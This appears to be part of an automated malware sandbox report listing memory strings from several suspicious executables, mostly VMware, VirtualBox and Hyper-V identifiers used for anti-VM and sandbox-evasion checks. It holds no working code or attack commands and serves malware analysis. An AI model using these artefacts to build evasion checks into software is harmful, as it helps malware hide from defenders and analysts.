Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2317597031.00000000014F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}-S
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}q
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2190458786.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2188731263.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2218651908.0000000002F20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000<
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3136517564.000000000122E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416509107.0000000005FDB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b},P
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2317501058.0000000001251000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\#disk&ven_vmware&prouask#4&1656f219&0&0000f5-b6bf-11d0-94f2-00a08b
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.00000000011E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320pzIzG
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Hyper-V (guest)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareh
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: svchost.exe, 00000003.00000002.2882896002.000001AC2362B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: ~VirtualMachineTypes
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000BD7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181541626.0000000002F20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeST\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2181678034.0000000002F20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2414122665.0000000005E7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}E
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}A
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.0000000001266000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018A8000.00000004.00000020.00020000.00000000.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001514000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, softjenimmp3converter.exe, 00000031.00000002.3123922787.00000000008DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000003.2137721811.00000000018BD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2891186635.000001AC23640000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}R
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}K
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001480000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2882896002.000001AC23633000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: svchost.exe, 00000003.00000003.1624757675.000001AC23644000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: xVBoxService.exe
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3137071577.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2193008587.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2195905601.0000000002F20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3136449020.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: VBoxService.exe
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2184193605.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2185298361.0000000002F20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
